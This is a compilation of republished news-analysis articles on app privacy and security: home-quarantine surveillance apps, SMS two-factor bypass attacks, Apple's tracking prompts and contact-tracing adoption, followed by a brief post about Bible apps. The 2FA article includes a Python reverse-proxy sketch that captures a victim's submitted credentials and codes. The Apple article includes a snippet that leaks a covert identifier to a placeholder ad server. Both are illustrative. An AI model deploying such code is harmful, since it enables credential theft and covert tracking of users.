I’d prefer an ankle tag: why home quarantine apps are a bad idea



Toby Walsh, UNSW

South Australia has begun a trial of a new COVID app to monitor arrivals into the state. SA Premier Steven Marshall claimed “every South Australian should feel pretty proud that we are the national pilot for the home-based quarantine app”.

He then doubled down with the boast that he was “pretty sure the technology that we have developed within the South Australia government will become the national standard and will be rolled out across the country.”

Victoria too has announced impending “technologically supported” home quarantine, though details remain unclear. Home quarantine will also eventually be available for international arrivals, according to Prime Minister Scott Morrison.

The South Australian app has received little attention in Australia, but in the US the left-leaning Atlantic magazine called it “as Orwellian as any in the free world”. Right-wing outlets such as Fox News and Breitbart also joined the attack, and for once I find myself in agreement with them.

Location tracking and facial recognition

Image: The South Australian home quarantine app uses facial recognition software to identify users. (Government of South Australia)

Despite the SA Premier’s claims, this isn’t the first such app to be used in Australia. A similar home-quarantine app is already in use for arrivals into Western Australia (WA), and in some cases the Northern Territory.

Both apps use geolocation and facial recognition software to track and identify those in quarantine. Users are required to prove they are at home when randomly prompted by the application.

In SA, you have 15 minutes to get the face recognition software to verify you’re still at home. In WA, it is more of a race. You have just 5 minutes before you risk a knock on the door from the police.

Another difference is that the SA app is opt-in, at least for now. The WA app is already mandatory for arrivals from high-risk areas such as Victoria. For extreme-risk areas such as NSW, it’s straight into a quarantine hotel.

Reasons for concern

But why are we developing such home-quarantine apps in the first place, when we already have a cheap technology to do this? If we want to monitor that people are at home (and that’s a big if), wouldn’t one of the ankle tags already used by our corrective services for home detention be much simpler, safer and more robust?

There are many reasons to be concerned about home-quarantine apps.

First, they’ll likely be much easier to hack than ankle tags. How many of us have hacked geo-blocks to access Netflix in the US, or to watch other digital content from another country? Faking GPS location on a smartphone is not much more difficult.

Second, facial recognition software is often flawed, and is frequently biased against people of colour and against women. The documentary Coded Bias does a great job unpicking these biases.


Despite years of effort, even big tech giants such as Google and Amazon have been unable to eliminate these biases from their software. I have little hope the SA government or the WA company GenVis, the developers of the two Australian home-quarantine apps, will have done better.

Indeed, the Australian Human Rights Commission has called for a moratorium on the use of facial recognition software in high-risk settings such as policing until better regulation is in place to protect human rights and privacy.

Third, there needs to be a much more detailed and public debate around issues like privacy, and safeguards put in place based on this discussion, in advance of the technology being used.

With COVID check-in apps, we were promised the data would only be used for public health purposes. But police forces around Australia have accessed this information for other ends on at least six occasions. This severely undermines the public’s confidence in, and use of, such apps.




Read more: Police access to COVID check-in data is an affront to our privacy. We need stronger and more consistent rules in place


Before it was launched, the Commonwealth’s COVIDSafe app had legislative prohibitions put in place on the use of the data collected for anything but contact tracing. This perhaps gave us a false sense of security as the state-produced COVID check-in apps did not have any such legal safeguards. Only some states have retrospectively introduced legislation to provide such protections.

Fourth, we have to worry about how software like this legitimises technologies like facial recognition that ultimately erode fundamental rights such as the right to privacy.

If home-quarantine apps work successfully, will they open the door to facial recognition being used in other settings? To identify shoplifters? To provide access to welfare? Or to healthcare? What Orwellian world will this take us to?

The perils of facial recognition

In China, we have already seen facial recognition software used to monitor and persecute the Uighur minority. In the US, at least three Black people have already wrongly ended up in jail due to facial recognition errors.

Facial recognition is a technology that is dangerous if it doesn’t work (as is often the case). And dangerous if it does. It changes the speed, scale and cost of surveillance.

With facial recognition software behind the CCTV cameras found on many street corners, you can be tracked 24/7. You are no longer anonymous when you go out to the shops. Or when you protest about Black lives mattering or the climate emergency.

High technology is not the solution

High tech software like facial recognition isn’t a fix for the problems that have plagued Australia’s response to the pandemic. It can’t remedy the failure to buy enough vaccines, the failure to build dedicated quarantine facilities, or the in-fighting and point-scoring between states and with the Commonwealth.

I never thought I’d say this but, all in all, I think I’d prefer an ankle tag. And if the image of the ankle tag seems too unsettling for you, we could do what Hong Kong has done and make it a wristband.

Toby Walsh, Professor of AI at UNSW, Research Group Leader, UNSW

This article is republished from The Conversation under a Creative Commons license. Read the original article.

How hackers can use message mirroring apps to see all your SMS texts — and bypass 2FA security



Syed Wajid Ali Shah, Deakin University; Jongkil Jay Jeong, Deakin University, and Robin Doss, Deakin University

It’s now well known that usernames and passwords aren’t enough to securely access online services. A recent study highlighted that more than 80% of all hacking-related breaches happen due to compromised and weak credentials, with three billion username/password combinations stolen in 2016 alone.

As such, the implementation of two-factor authentication (2FA) has become a necessity. Generally, 2FA aims to provide an additional layer of security to the relatively vulnerable username/password system.

It works too. Figures suggest users who enabled 2FA ended up blocking about 99.9% of automated attacks.

But as with any good cybersecurity solution, attackers can quickly come up with ways to circumvent it. They can bypass 2FA through the one-time codes sent as an SMS to a user’s smartphone.

Yet many critical online services in Australia still use SMS-based one-time codes, including myGov and the Big 4 banks: ANZ, Commonwealth Bank, NAB and Westpac.




Read more: A computer can guess more than 100,000,000,000 passwords per second. Still think yours is secure?


So what’s the problem with SMS?

Major vendors such as Microsoft have urged users to abandon 2FA solutions that leverage SMS and voice calls. This is because SMS has notoriously poor security, leaving it open to a host of different attacks.

For example, SIM swapping has been demonstrated as a way to circumvent 2FA. SIM swapping involves an attacker convincing a victim’s mobile service provider they themselves are the victim, and then requesting the victim’s phone number be switched to a device of their choice.

SMS-based one-time codes can also be compromised through readily available tools such as Modlishka, which leverage a technique called a reverse proxy. This relays communication between the victim and the service being impersonated.

So in the case of Modlishka, it will intercept communication between a genuine service and a victim, and will track and record the victim’s interactions with the service, including any login credentials they may use.
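
To make the reverse-proxy idea concrete, here is a minimal sketch of how such a tool can sit between a victim and a genuine site, forwarding traffic while recording whatever the victim submits. This is not Modlishka’s actual code: the hostname and port are placeholders, and real tools also rewrite links and handle TLS.

```python
# Minimal reverse-proxy sketch: forwards requests to a genuine site
# while logging whatever the victim submits (e.g. credentials, SMS codes).
# Illustrative only -- hostname and port are placeholders.
from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.request

GENUINE_SITE = "https://example-bank.com"  # hypothetical impersonated service

class ProxyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self._relay()

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        # This is the interception step: the attacker records the form data.
        print("captured POST data:", body.decode(errors="replace"))
        self._relay(body)

    def _relay(self, body=None):
        # Forward the victim's request to the genuine site and return its
        # response, so the victim sees real pages and suspects nothing.
        req = urllib.request.Request(GENUINE_SITE + self.path, data=body)
        with urllib.request.urlopen(req) as resp:
            payload = resp.read()
            self.send_response(resp.status)
            self.send_header("Content-Type",
                             resp.headers.get("Content-Type", "text/html"))
            self.end_headers()
            self.wfile.write(payload)

if __name__ == "__main__":
    HTTPServer(("", 8080), ProxyHandler).serve_forever()
```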

In addition to these existing vulnerabilities, our team has found additional vulnerabilities in SMS-based 2FA. One particular attack exploits a feature provided on the Google Play Store to automatically install apps from the web to your Android device.

Image: Due to syncing services, if a hacker manages to compromise your Google login credentials on their own device, they can then install a message mirroring app directly onto your smartphone. (Shutterstock)

If an attacker has access to your credentials and manages to log into your Google Play account on a laptop (although you will receive a prompt), they can then install any app they’d like automatically onto your smartphone.

The attack on Android

Our experiments revealed a malicious actor can remotely access a user’s SMS-based 2FA with little effort, through the use of a popular app (name and type withheld for security reasons) designed to synchronise users’ notifications across different devices.

Specifically, attackers can leverage a compromised email/password combination connected to a Google account (such as username@gmail.com) to nefariously install a readily-available message mirroring app on a victim’s smartphone via Google Play.

This is a realistic scenario since it’s common for users to use the same credentials across a variety of services. Using a password manager is an effective way to make your first line of authentication — your username/password login — more secure.

Once the app is installed, the attacker can apply simple social engineering techniques to convince the user to enable the permissions required for the app to function properly.

For example, they may pretend to be calling from a legitimate service provider to persuade the user to enable the permissions. After this they can remotely receive all communications sent to the victim’s phone, including one-time codes used for 2FA.

Although multiple conditions must be fulfilled for the aforementioned attack to work, it still demonstrates the fragile nature of SMS-based 2FA methods.

More importantly, this attack doesn’t need high-end technical capabilities. It simply requires insight into how these specific apps work and how to intelligently use them (along with social engineering) to target a victim.

The threat is even more real when the attacker is a trusted individual (e.g., a family member) with access to the victim’s smartphone.

What’s the alternative?

To remain protected online, you should check whether your initial line of defence is secure. First, check whether your password has been compromised; a number of security services will let you do this. And make sure you’re using a well-crafted password.
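
One such service is Have I Been Pwned, whose free “Pwned Passwords” range API lets you check a password against known breaches without revealing it: only the first five characters of the password’s SHA-1 hash ever leave your machine. A minimal sketch:

```python
# Check a password against the Have I Been Pwned "range" API.
# Only the first 5 hex characters of the SHA-1 hash are sent
# (k-anonymity), never the password itself.
import hashlib
import urllib.request

def pwned_count(password: str) -> int:
    sha1 = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    with urllib.request.urlopen(url) as resp:
        for line in resp.read().decode().splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)  # times this password appears in breaches
    return 0

if __name__ == "__main__":
    print(pwned_count("password123"))  # a known-breached password; expect a large count
```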

We also recommend you limit the use of SMS as a 2FA method if you can. You can instead use app-based one-time codes, such as those generated by Google Authenticator. In this case the code is generated within the app on your device itself, rather than being sent to you.
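
Such app-generated codes typically follow the time-based one-time password (TOTP) standard, RFC 6238. The sketch below shows the underlying maths; the demo secret is an arbitrary example, not a real account key.

```python
# Generate an RFC 6238 time-based one-time password (TOTP) --
# the same scheme apps like Google Authenticator implement.
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, digits: int = 6, period: int = 30) -> str:
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // period           # 30-second time step
    msg = struct.pack(">Q", counter)               # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                     # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

if __name__ == "__main__":
    print(totp("JBSWY3DPEHPK3PXP"))  # demo secret; prints the current 6-digit code
```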

However, this approach can also be compromised by hackers using some sophisticated malware. A better alternative would be to use dedicated hardware devices such as YubiKey.

Image: The YubiKey, first developed in 2008, is an authentication device designed to support one-time password and 2FA protocols without having to rely on SMS-based 2FA. (Shutterstock)

These are small USB (or near-field communication-enabled) devices that provide a streamlined way to enable 2FA across different services.

Such physical devices need to be plugged into or brought into close proximity of a login device as a part of 2FA, therefore mitigating the risks associated with visible one-time codes, such as codes sent by SMS.
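
To see why this mitigates interception, consider a minimal challenge-response model. This is a conceptual sketch only, not the full FIDO2/U2F protocol (which uses public-key signatures rather than a shared secret): the service issues a fresh random challenge, and the device answers with a keyed response computed from a secret that never leaves the hardware, so there is no reusable code for an attacker to capture.

```python
# Conceptual sketch of hardware-key challenge-response (NOT full FIDO2/U2F).
# The device's secret never leaves the "hardware"; each login uses a fresh
# challenge, so a captured response is useless for the next login.
import hashlib
import hmac
import os

class HardwareKey:
    def __init__(self):
        self._secret = os.urandom(32)  # stays inside the device

    def respond(self, challenge: bytes) -> bytes:
        return hmac.new(self._secret, challenge, hashlib.sha256).digest()

    def register(self) -> bytes:
        # Real protocols register a public key with the server; sharing the
        # secret here is a simplification purely for illustration.
        return self._secret

key = HardwareKey()
server_copy = key.register()

challenge = os.urandom(16)          # server issues a fresh challenge
response = key.respond(challenge)   # device answers locally

# Server verifies; a replayed response fails against any new challenge.
assert hmac.compare_digest(
    response, hmac.new(server_copy, challenge, hashlib.sha256).digest()
)
```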

It must be stressed that any 2FA alternative still requires some level of active participation and responsibility from the user.

At the same time, further work must be carried out by service providers, developers and researchers to develop more accessible and secure authentication methods.

Essentially, these methods need to go beyond 2FA and towards a multi-factor authentication environment, where multiple methods of authentication are simultaneously deployed and combined as needed.




Read more: Can I still be hacked with 2FA enabled?




Syed Wajid Ali Shah, Research Fellow, Centre for Cyber Security Research and Innovation, Deakin University; Jongkil Jay Jeong, CyberCRC Research Fellow, Centre for Cyber Security Research and Innovation (CSRI), Deakin University, and Robin Doss, Research Director, Centre for Cyber Security Research and Innovation, Deakin University

This article is republished from The Conversation under a Creative Commons license. Read the original article.

Apple’s new ‘app tracking transparency’ has angered Facebook. How does it work, what’s all the fuss about, and should you use it?


Amr Alfiky/AP

Paul Haskell-Dowland, Edith Cowan University and Nikolai Hampton, Edith Cowan University

Apple users across the globe are adopting the latest operating system update, called iOS 14.5, featuring the now-obligatory new batch of emojis.

But there’s another change that’s arguably less fun but much more significant for many users: the introduction of “app tracking transparency”.

This feature promises to usher in a new era of user-oriented privacy, and not everyone is happy — most notably Facebook, which relies on tracking web users’ browsing habits to sell targeted advertising. Some commentators have described it as the beginnings of a new privacy feud between the two tech behemoths.

So, what is app tracking transparency?

App tracking transparency is a continuation of Apple’s push to be recognised as the platform of privacy. The new feature requires apps to display a pop-up notification that explains what data the app wants to collect, and what it proposes to do with it.


There is nothing users need to do to gain access to the new feature, other than install the latest iOS update, which happens automatically on most devices. Once upgraded, apps that use tracking functions will display a request to opt in or out of this functionality.

Image: The new App Tracking Transparency feature across iOS, iPadOS and tvOS requires apps to get the user’s permission before tracking their data across apps or websites owned by other companies. (Apple Newsroom)

How does it work?

As Apple has explained, the app tracking transparency feature is a new “application programming interface”, or API — a suite of programming commands used by developers to interact with the operating system.

The API gives software developers a few pre-canned functions that allow them to do things like “request tracking authorisation” or use the tracking manager to “check the authorisation status” of individual apps.

In more straightforward terms, this gives app developers a uniform way of requesting these tracking permissions from the device user. It also means the operating system has a centralised location for storing and checking what permissions have been granted to which apps.

What is missing from the fine print is that there is no technical mechanism to actually prevent the tracking of a user. The app tracking transparency framework is merely a pop-up box.

It is also interesting to note the specific wording of the pop-up: “ask app not to track”. If the application is using legitimate “device advertising identifiers”, answering no will result in this identifier being set to zero. This will reduce the tracking capabilities of apps that honour Apple’s tracking policies.

However, if an app is really determined to track you, there are many techniques that could allow it to create surreptitious user-specific identifiers, which may be difficult for Apple to detect or prevent.

For example, while an app might not use Apple’s “device advertising identifier”, it would be easy for the app to generate a little bit of “random data”. This data could then be passed between sites under the guise of normal operations such as retrieving an image with the data embedded in the filename. While this would contravene Apple’s developer rules, detecting this type of secret data could be very difficult.
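
As a purely hypothetical illustration of that trick (the host and filename scheme below are invented), an app could draw some random data once, persist it, and then smuggle it out as the “filename” of an ordinary-looking image request:

```python
# Illustration of the covert-identifier trick described above.
# The app generates "random data" once, stores it, then leaks it inside
# what looks like a routine image fetch. Host and paths are invented.
import urllib.request
import uuid

TRACKER_HOST = "https://cdn.example-ads.net"  # hypothetical ad server

def get_covert_id(store: dict) -> str:
    # Generated once and persisted, so the same ID follows this user forever.
    if "covert_id" not in store:
        store["covert_id"] = uuid.uuid4().hex
    return store["covert_id"]

def fetch_banner(store: dict) -> bytes:
    covert_id = get_covert_id(store)
    # The identifier rides along as the "filename" of a normal image request,
    # which is hard to distinguish from legitimate traffic.
    url = f"{TRACKER_HOST}/banners/{covert_id}.png"
    with urllib.request.urlopen(url) as resp:
        return resp.read()
```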




Read more: Your smartphone apps are tracking your every move – 4 essential reads


Apple seems prepared to crack down hard on developers who don’t play by the rules. The most recent additions to Apple’s App Store guidelines explicitly tell developers:

You must receive explicit permission from users via the App Tracking Transparency APIs to track their activity.

It’s unlikely major app developers will want to fall foul of this policy — a ban from the App Store would be costly. But it’s hard to imagine Apple sanctioning a really big player like Facebook or TikTok without some serious behind-the-scenes negotiation.

Why is Facebook objecting?

Facebook is fuelled by web users’ data. Inevitably, anything that gets in the way of its gargantuan revenue-generating network is seen as a threat. In 2020, Facebook’s revenue from advertising exceeded US$84 billion – a 21% rise on 2019.

The issues are deep-rooted and reflect the two tech giants’ very different business models. Apple’s business model is the sale of laptops, computers, phones and watches – with a significant proportion of its income derived from the vast ecosystem of apps and in-app purchases used on these devices. Apple’s app revenue was reported at US$64 billion in 2020.

With a vested interest in ensuring its customers are loyal and happy with its devices, Apple is well positioned to deliver privacy without harming profits.

Should I use it?

Ultimately, it is a choice for the consumer. Many apps and services are offered ostensibly for free to users. App developers often cover their costs through subscription models, in-app purchases or in-app advertising. If enough users decide to embrace privacy controls, developers will either change their funding model (perhaps moving to paid apps) or attempt to find other ways to track users to maintain advertising-derived revenue.

If you don’t want your data to be collected (and potentially sold to unnamed third parties), this feature offers one way to restrict the amount of your data that is trafficked in this way.

But it’s also important to note that tracking of users and devices is a valuable tool for advertising optimisation by building a comprehensive picture of each individual. This increases the relevance of each advert while also reducing advertising costs (by only targeting users who are likely to be interested). Users also arguably benefit, as they see more (relevant) adverts that are contextualised for their interests.

It may slow down the rate at which we receive personalised ads in apps and websites, but this change won’t be an end to intrusive digital advertising. In essence, this is the price we pay for “free” access to these services.




Read more: Facebook data breach: what happened and why it’s hard to know if your data was leaked




Paul Haskell-Dowland, Associate Dean (Computing and Security), Edith Cowan University and Nikolai Hampton, School of Science, Edith Cowan University

This article is republished from The Conversation under a Creative Commons license. Read the original article.

Not just complacency: why people are reluctant to use COVID-19 contact-tracing apps




Farkhondeh Hassandoust, Auckland University of Technology

This week’s announcement of two new COVID-19 vaccine pre-purchase deals is encouraging, but doesn’t mean New Zealanders should become complacent about using the NZ COVID Tracer app during the summer holidays.

The immunisation rollout won’t start until the second quarter of 2021, and the government is encouraging New Zealanders to continue using the app, including the recently upgraded Bluetooth function, as part of its plan to manage the pandemic during the holiday period.




Read more: How to keep COVID-19 at bay during the summer holidays — and help make travel bubbles a reality in 2021


During the past weeks, the number of daily scans has dropped significantly, down from just over 900,000 scans per day at the end of November to fewer than 400,000 in mid-December.

With no active cases of COVID-19 in the community, complacency might be part of the issue in New Zealand, but as our research in the US shows, worries about privacy and trust continue to make people reluctant to use contact-tracing apps.

Concerns about privacy and surveillance

We surveyed 853 people from every state in the US to identify the factors promoting or inhibiting their use of contact-tracing applications. Our survey reveals two seemingly contradictory findings.

Individuals are highly motivated to use contact-tracing apps, for the sake of their own health and that of society as a whole. But the study also found people are concerned about privacy, social disapproval and surveillance.

The findings suggest people’s trust in the data collectors is dependent on the technology features of these apps (for example, information sensitivity and anonymity) and the privacy protection initiatives instigated by the authorities.

With the holiday season just around the corner — and even though New Zealand is currently free of community transmission — our findings are pertinent. New Zealanders will travel more during the summer period, and it is more important than ever to use contact-tracing apps to improve our chances of getting on top of any potential outbreaks as quickly as possible.

How, then, to overcome concerns about privacy and trust and make sure New Zealanders use the upgraded app during summer?

The benefits of adopting contact-tracing apps are mainly in shared public health, and it is important these societal health benefits are emphasised. In order to quell concerns, data collectors (government and businesses) must also offer assurance that people’s real identity will be concealed.

It is the responsibility of the government and the office of the Privacy Commissioner to ensure all personal information is managed appropriately.




Read more: An Australia–NZ travel bubble needs a unified COVID contact-tracing app. We’re not there


Transparency and data security

Our study also found that factors such as peer and social influence, regulatory pressures and previous experiences with privacy loss underlie people’s readiness to adopt contact-tracing apps.

The findings reveal that people expect regulatory protection if they are to use contact-tracing apps. This confirms the need for laws and regulations with strict penalties for those who collect, use, disclose or decrypt collected data for any purpose other than contact tracing.

The New Zealand government is working with third-party developers to complete the integration of other apps by the end of December to enable the exchange of digital contact-tracing information from different apps and technologies.

The Privacy Commissioner has already endorsed the Bluetooth upgrade of the official NZ COVID Tracer app because of its focus on users’ privacy. And the Ministry of Health aims to release the source code for the app so New Zealanders can see how their personal data is managed.

Throughout the summer, the government and ministry should emphasise the importance of using the contact-tracing app and assure New Zealanders about the security and privacy of their personal data.

Adoption of contact-tracing apps is no silver bullet in the battle against COVID-19, but it is a crucial element in New Zealand’s collective public health response to the global pandemic.

Farkhondeh Hassandoust, Lecturer, Auckland University of Technology

This article is republished from The Conversation under a Creative Commons license. Read the original article.

Bible Apps in the Pew


The link below is to an article that reports on the increasing use of tablets, smartphones and other gadgets in the pew during church services, as modern technology makes its presence felt at the local level.

Do you use a digital version of the Bible during church services? If so, what do you use? Please share in the comments.

For more visit:
http://bits.blogs.nytimes.com/2013/07/27/the-bible-gets-an-upgrade/